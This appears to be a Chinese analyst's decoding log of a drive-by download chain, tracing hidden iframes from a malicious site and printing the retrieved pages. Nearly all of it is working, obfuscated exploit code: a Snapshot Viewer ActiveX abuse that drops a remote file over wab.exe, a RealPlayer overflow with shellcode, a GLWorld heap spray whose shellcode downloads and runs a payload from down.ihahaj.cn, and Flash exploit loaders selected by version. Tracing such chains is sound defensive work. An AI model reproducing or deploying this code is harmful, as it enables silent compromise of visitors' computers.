还有flash
怎么感觉和昨天的一样
要是不死机的话就比你快了
关于:hxxp://www.yhahaz.cn/dfll/a39.htm解密的日志(自动模式 - 4):
AUTO>http://fhahag.cn/a39/fxx.htm
关于:hxxp://fhahag.cn/a39/fxx.htm解密的日志(自动模式 - 14):
AUTO>http://fhahag.cn/a01/sina.htm
<HTML><HEAD>
<SCRIPT type=text/javascript>
function rpppr()
{
return true;
}
window.onerror = rpppr;
var x;
var oootuso;
var tu_bj = new Array();
tu_bj[0] = "c:/Program Files/Outlook Express/wab.exe";
tu_bj[1] = "d:/Program Files/Outlook Express/wab.exe";
tu_bj[2] = "e:/Program Files/Outlook Express/wab.exe";
var p33333s333333spspq = new ActiveXObject("\x73\x6e\x70\x76\x77\x2e\x53\x6e\x61\x70\x73\x68\x6f\x74 \x56\x69\x65\x77\x65\x72\x43\x6f\x6e\x74\x72\x6f\x6c\x2e\x31");
if(p33333s333333spspq="[object]")
{
setTimeout('window.location = "ldap://"',3000);
for (x in tu_bj)
{
oootuso = new ActiveXObject("\x73\x6e\x70\x76\x77\x2e\x53\x6e\x61\x70\x73\x68\x6f\x74 \x56\x69\x65\x77\x65\x72\x43\x6f\x6e\x74\x72\x6f\x6c\x2e\x31")
var tuf1 = 'http://down.ihahaj.cn/new/a01.css';
var tuf2=tu_bj[x];
oootuso.Zoom = 0;
oootuso.ShowNavigationButtons = false;
oootuso.AllowContextMenu = false;
oootuso.SnapshotPath = tuf1;
try
{
oootuso["\x43\x6f\x6d\x70\x72\x65\x73\x73\x65\x64\x50\x61\x74\x68"] = tuf2;
oootuso["\x0050\x0072\x0069\x006e\x0074\x0053\x006e\x0061\x0070\x0073\x0068\x006f\x0074"]();
}catch(e){}
}
}
</SCRIPT>
<META content=VFPEUAGBSX name=SKYPE_FRAMEID>
<META content=VFPEUAGBSX name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY><BR><BR><BR><BR></BODY></HTML>
download http://down.ihahaj.cn/new/a01.css
over
AUTO>http://fhahag.cn/a01/ms06014.htm
无法找到该页
AUTO>http://fhahag.cn/a01/ss.htm
无法链接
AUTO>http://fhahag.cn/a39/fxx.htm
<HTML><HEAD>
<SCRIPT>
document.write("<Iframe width=100 height=0 src=fx.htm></iframe>");
document.write("");
document.write("<Iframe width=100 height=0 src=../a01/ss.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<Iframe width=100 height=0 src=../a01/Ms06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x65\x72\x2e\x44\x4c\x6f\x61\x64\x65\x72\x2e\x31");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a01/sina.htm></iframe>");}}
try{var n;var qxxxxx="dxac";var qxaaxx="aaaac";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};
finally{if(n!="[object Error]"){document.write("Downloader.DLoader.1");
document.write("<Iframe width=100 height=0 src=../a01/no.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("MPS.StormPlayer");}
catch(b){};
finally{if(b!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a01/bfyy.htm></iframe>");}}
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};
finally{var dxl="x";if(f!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a01/GLWORLD.html></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32"){var ammc="dsvb";
document.write('<iframe style=display:none src="../a01/real.htm"></iframe>');}
else
document.write('<iframe style=display:none src="../a01/real.html"></iframe>');
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";abc="dfdae";document.write("");var fkav="BS";var fkasaccv="BS";var fkaqfccv="BS";var fkaqjfccv="BS";
</SCRIPT>
<META content=KQXEEPJHVF name=SKYPE_FRAMEID>
<META content=KQXEEPJHVF name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY><IFRAME src="fx.htm" width=100 height=0></IFRAME><IFRAME src="../a01/ss.htm" width=100 height=0></IFRAME><IFRAME src="../a01/Ms06014.htm" width=100 height=0></IFRAME></BODY></HTML>
绕回去了
AUTO>http://fhahag.cn/a39/fx.htm
<HTML><HEAD>
<SCRIPT>
window["\x6f\x6e\x65\x72\x72\x6f\x72"]=function (){
return true;
}
function init(){var kdslsd="asdcbn";
window["\x73\x74\x61\x74\x75\x73"]="";
}window["\x6f\x6e\x6c\x6f\x61\x64"]=init;
if(document.cookie.indexOf("play=")==-1)
{var ppppvvvv="gppp";var expires=new Date();var spnbv="fdsfds";
expires.setTime(expires.getTime()+0*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("");
document.write("<IFrame src=Ilink.html width=100 height=0></iframe>");
document.write("");
}
else {
document.write("");
document.write("<iframe src=flink.html width=100 height=0></iframe>");var xfcx="xqc";
}}
var ksp="nishiyizhizhu";
</SCRIPT>
<META content=PUDOBPTIKJ name=SKYPE_FRAMEID>
<META content=PUDOBPTIKJ name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY><IFRAME src="Ilink.html" width=100 height=0></IFRAME></BODY></HTML>
又绕了两个链接
AUTO>http://fhahag.cn/a39/flink.html
<HTML><HEAD>
<SCRIPT src="swfobject.js" type=text/javascript></SCRIPT>
<META content=UDCJALXUMW name=SKYPE_FRAMEID>
<META content=UDCJALXUMW name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>
<DIV id=flashcontent>111</DIV>
<DIV id=flashversion>222</DIV>
<SCRIPT type=text/javascript>
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "SB";
var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent");
var fgfdbdf = "wef";
}else if(version['rev']==64){
var fuckavp = "SB";
var hbbf = "wfvvvv";
var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent");
var djcshk="dscc";
}else if(version['rev']==47){
var snjd="dsa";
var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else if(version['rev']==45){
var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else if(version['rev']==28){
var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==16){
var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
document.getElementById('flashversion').innerHTML=""
}
}
}var fkav="BS";
</SCRIPT>
</BODY></HTML>
download ./f115.swf ./f115.swf ./f64.swf ./f45.swf ./f47.swf ./f28.swf ./f16.swf
AUTO>http://fhahag.cn/a39/swfobject.js
not virus
AUTO>http://fhahag.cn/a39/+
空连接
AUTO>http://fhahag.cn/a39/ilink.html
<HTML><HEAD>
<SCRIPT src="swfobject.js"></SCRIPT>
<META content=OTPPUISUBX name=SKYPE_FRAMEID>
<META content=OTPPUISUBX name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>
<DIV id=flashcontent>111</DIV>
<DIV id=flashversion>222</DIV>
<SCRIPT type=text/javascript>
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
var fuckavp = "DZ";
var fuckaxp = "aa";
var fuckaqp = "c";
var so=new SWFObject("./i11"+"5.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']==45){
var fqdscc = "P";
var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");
var wevbhpa = "qrffc";
so.write("flashcontent")
}else if(version['rev']==16){
var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else if(version['rev']==64){var hgds = "DZ";
so=new SWFObject("\x2e\x2f\x69\x36\x34\x2e\x73\x77\x66","\x6d\x79\x6d\x6f\x76\x69\x65","\x30\x2e\x31","\x30\x2e\x31","\x39","\x23\x30\x30\x30\x30\x30\x30");
var qwea = "qwecb";
so.write("flashcontent")
}else if(version['rev']==28){
var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent");
}else if(version['rev']==47){
var fuckavpx = "DZ";
var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")
}else if(version['rev']>=124){
if(document.getElementById){
var fisx="gf";
document.getElementById('flashversion').innerHTML=""
}
}
}
var fkav="BS";var fkaav="BS";
</SCRIPT>
</BODY></HTML>
download ./i11 5.swf ./i45.swf ./i16.swf ./i28.swf ./i47.swf
AUTO>http://fhahag.cn/a01/real.htm
<HTML><HEAD>
<META content=JNYGNRIKVI name=SKYPE_FRAMEID>
<META content=JNYGNRIKVI name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>/* */
<SCRIPT language=JavaScript>
function WQWWQeqq_RealPlayer_Exp_YingYing_Anhey_ssssssssssssssssssssssssssss()
{
var addr=["%75"+"%06%74"+"%04","%7f"+"%a5"+"%60","%4f"+"%71"+"%a4"+"%60","%63"+"%11"+"%08"+"%60","%63"+"%11"+"%04"+"%60","%79"+"%31"+"%01"+"%60","%79"+"%31"+"%09"+"%60","%51"+"%11"+"%70"+"%63"];
var user=navigator.userAgent["toLowerCase"]();
if(user["indexOf"]("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
var WQWWQeqq;
RealplayerObj="IaEaRa"+"PaCatal.I"+"EaRaP"+"Catal.1";
WQWWQeqq = RealplayerObj;
WQWWQeqq_Anhey_Real_Exp_Send = new window["ActiveXObject"](RealplayerObj.replace(/a/g,""));
CuteRealVersion3s = "andhi";
RealVersion = WQWWQeqq_Anhey_Real_Exp_Send["PlayerProperty"]("PRODUCT"+"VERSION");
sdfdgdfg="";
cvbcbb=unescape(addr[0]);
for(i=0;i<32*148;i++)
sdfdgdfg+="S";
if(RealVersion.indexOf("6.0.14.")==-1)
{
if(navigator.userLanguage.toLowerCase()=="zh-cn")
ret=unescape(addr[1]);
else if(navigator.userLanguage.toLowerCase()=="en-us")
ret=unescape(addr[2]);
else
return;
}
else if(RealVersion=="6.0.14.544")
ret=unescape(addr[3]);
else if(RealVersion=="6.0.14.550")
ret=unescape(addr[4]);
else if(RealVersion=="6.0.14.552")
ret=unescape(addr[5]);
else if(RealVersion=="6.0.14.543")
ret=unescape(addr[6]);
else if(RealVersion=="6.0.14.536")
ret=unescape(addr[7]);
else
return;
if(RealVersion.indexOf("6.0.10.")!=-1)
{
for(i=0;i<4;i++)
sdfdgdfg=sdfdgdfg+cvbcbb;
sdfdgdfg=sdfdgdfg+ret;
}
else if(RealVersion.indexOf("6.0.11.")!=-1)
{
for(i=0;i<6;i++)
sdfdgdfg=sdfdgdfg+cvbcbb;
sdfdgdfg=sdfdgdfg+ret;
}
else if(RealVersion.indexOf("6.0.12.")!=-1)
{
for(i=0;i<9;i++)
sdfdgdfg=sdfdgdfg+cvbcbb;
sdfdgdfg=sdfdgdfg+ret;
}
else if(RealVersion.indexOf("6.0.14.")!=-1)
{
for(i=0;i<10;i++)
sdfdgdfg=sdfdgdfg+cvbcbb;
sdfdgdfg=sdfdgdfg+ret;
}
var Kfqq, Qqs="Fucking AntiVirus"; q343434w343f4344gs44g="LLLL\\XXXXXLD"; Kfqq = Qqs;
q12p23c34="";
q12p23c34=q12p23c34+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpf";
q12p23c34=q12p23c34+"KRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzM";
q12p23c34=q12p23c34+"Fv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPr";
q12p23c34=q12p23c34+"f5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMT";
q12p23c34=q12p23c34+"noeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEle";
q12p23c34=q12p23c34+"oWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPf";
q12p23c34=q12p23c34+"cVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP";
q12p23c34=q12p23c34+"9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoSTPorWPnTn3Y2HSQ58PaaztnasPntorN3UQgFOPaP0P1tn1spsrSOpS0";C2="";
t999999p99999t=sdfdgdfg+q343434w343f4344gs44g+q12p23c34;
temp=0x8000;
while(t999999p99999t.length < temp) t999999p99999t+="lizhen";
var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\TestSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];
WQWWQeqq_Anhey_Real_Exp_Send["import"](arr1[Math.floor(Math["random"]()*6)], t999999p99999t, "123456456", 0, 0);
}
WQWWQeqq_RealPlayer_Exp_YingYing_Anhey_ssssssssssssssssssssssssssss();
var fkcxfdsmdf="cvcb";var ffdf="cvcb";var ffdeadf="cvcb";
</SCRIPT>
</BODY></HTML>
AUTO>http://fhahag.cn/a01/glworld.html
<HTML><HEAD>
<META content=QECDRHVQSU name=SKYPE_FRAMEID>
<META content=QECDRHVQSU name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>
<OBJECT id=PlayBoy2008 classid=clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69></OBJECT>
<SCRIPT>
var tOx=window["unescape"](""+"%u54EB"+"%u758B"+"%u8B3C"+"%u3574"+"%u0378"+"%u56F5"+"%u768B"+"%u0320"+"%u33F5"+"%u49C9"+"%uAD41"+"%uDB33"+"%u0F36"+"%u14BE"+"%u3828"+"%u74F2"+"%uC108"+"%u0DCB"+"%uDA03"+"%uEB40"+"%u3BEF"+"%u75DF"+"%u5EE7"+"%u5E8B"+"%u0324"+"%u66DD"+"%u0C8B"+"%u8B4B"+"%u1C5E"+"%uDD03"+"%u048B"+"%u038B"+"%uC3C5"+"%u7275"+"%u6D6C"+"%u6E6F"+"%u642E"+"%u6C6C"+"%u4300"+"%u5C3A"+"%u2e55"+"%u7865"+"%u0065%uC033"+"%u0364"+"%u3040"+"%u0C78"+"%u408"+"B"+"%u8B0"+"C"+"%u"+"1C7"+"0%u8BA"+"D"+"%u084"+"0"+"%u09E"+"B%u408"+"B"+"%u8D3"+"4%"+"u7C4"+"0"+"%u408"+"B"+"%u953C"+"%u8EBF"+"%u0E4E"+"%uE8EC"+"%uFF84"+"%uFFFF"+"%uEC83"+"%u8304"+"%u242C"+"%uFF3C"+"%u95D0"+"%uBF50"+"%u1A36"+"%u702F"+"%u6FE8"+"%uFFFF"+"%u8BFF"+"%u2454"+"%u8DFC"+"%uBA52"+"%uDB33"+"%u5353"+"%uEB52"+"%u5324"+"%uD0FF"+"%uBF5D"+"%uFE98"+"%u0E8A"+"%u53E8"+"%uFFFF"+"%u83FF"+"%u04EC"+"%u2C83"+"%u6224"+"%uD0FF"+"%u7EBF"+"%uE2D8"+"%uE873"+"%uFF40"+"%uFFFF"+"%uFF52"+"%uE8D0"+"%uFFD7"+"%uFFFF"+"%u74"+"68"+"%u7074%u2f3a%u642f%u776f%u2e6e%u6869%u6861%u6a61%u632e%u2f6e%u656e%u2f77%u3061%u2e31%u7363%u0073");var tOxs="%u9090%u9090";var dadongx="qxcvbnm";var xLp=window["unescape"](tOxs);var xLps=0x40000;while(xLp["length"]<136)xLp+=xLp;xLpVips=xLp["substring"](0,136);xLpVip=xLp["substring"](0,xLp["length"]-136);while(xLpVip["length"]+136<xLps)xLpVip=xLpVip+xLpVip+xLpVips;okVips=new window["Array"]();for(x=0;x<300;x++)okVips[x]=xLpVip+tOx;var JiaoQiu='';while(JiaoQiu["length"]<4057)JiaoQiu=JiaoQiu+"\x0a\x0a\x0a\x0a";JiaoQiu=JiaoQiu+"\x0a";var lcfdfd="vc";JiaoQiu=JiaoQiu+"\x0a";JiaoQiu=JiaoQiu+"\x0a";JiaoQiu=JiaoQiu+"\x0a\x0a\x0a\x0a";JiaoQiu=JiaoQiu+"\x0a\x0a\x0a\x0a";PlayBoy2008["ChatRoom"](JiaoQiu);var kfjld="ds";</SCRIPT>
<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
</BODY></HTML>
AUTO>http://fhahag.cn/a01/bfyy.htm
can not find 404
AUTO>http://fhahag.cn/a01/no.htm
404
AUTO>http://down.ihahaj.cn/new/a01.css
AUTO>http://sj.tongji.cn.yahoo.com/860353/ystat.js
not
AUTO>http://www.yhahaz.cn/dfll/a39.htm
<HTML><HEAD></HEAD>
<BODY><BR><BR><IFRAME src="http://fhahag.cn/a39/fxx.htm" width=100 height=0></IFRAME><BR><BR>
<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<BR><BR>
<SCRIPT src="http://sj.tongji.cn.yahoo.com/860353/ystat.js" type=text/javascript></SCRIPT>
<NOSCRIPT><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/860353/ystat.gif"/></a></NOSCRIPT></BODY></HTML>
又绕圈子
AUTO>http://tongji.cn.yahoo.com ●
fx.htm |